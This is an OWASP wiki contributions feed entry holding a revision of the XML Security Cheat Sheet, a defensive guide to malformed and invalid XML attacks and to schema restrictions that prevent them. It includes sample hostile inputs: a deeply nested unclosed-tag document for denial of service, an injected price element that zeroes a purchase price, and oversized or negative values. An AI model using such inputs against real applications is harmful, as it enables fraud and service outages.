<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Fernando.arnaboldi</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Fernando.arnaboldi"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Fernando.arnaboldi"/>
		<updated>2026-05-19T10:22:08Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=238559</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=238559"/>
				<updated>2018-03-13T20:00:37Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: White space missing&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; __NOTOC__&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:Cheatsheets-header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}''' &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
 __TOC__{{TOC hidden}}&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;nowiki&amp;gt;&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;&amp;lt;/nowiki&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
